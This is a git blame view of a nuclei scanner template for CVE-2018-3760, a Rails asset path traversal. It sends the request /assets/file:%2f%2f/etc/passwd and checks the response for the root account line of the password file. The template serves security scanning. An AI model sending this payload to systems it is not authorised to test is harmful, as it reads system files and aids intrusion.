nuclei-templates/cves/CVE-2018-3760.yaml

21 lines
355 B
YAML
Raw Normal View History

2020-05-08 18:40:02 +00:00
id: CVE-2018-3760
2020-04-05 18:01:09 +00:00
info:
name: Rails cve-2018-3760
author: 0xrudra
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
matchers-condition: and
2020-04-05 18:01:09 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-05 18:01:09 +00:00
- type: regex
regex:
2020-05-25 07:49:06 +00:00
- "root:[x*]:0:0:"
2020-04-05 18:01:09 +00:00
part: body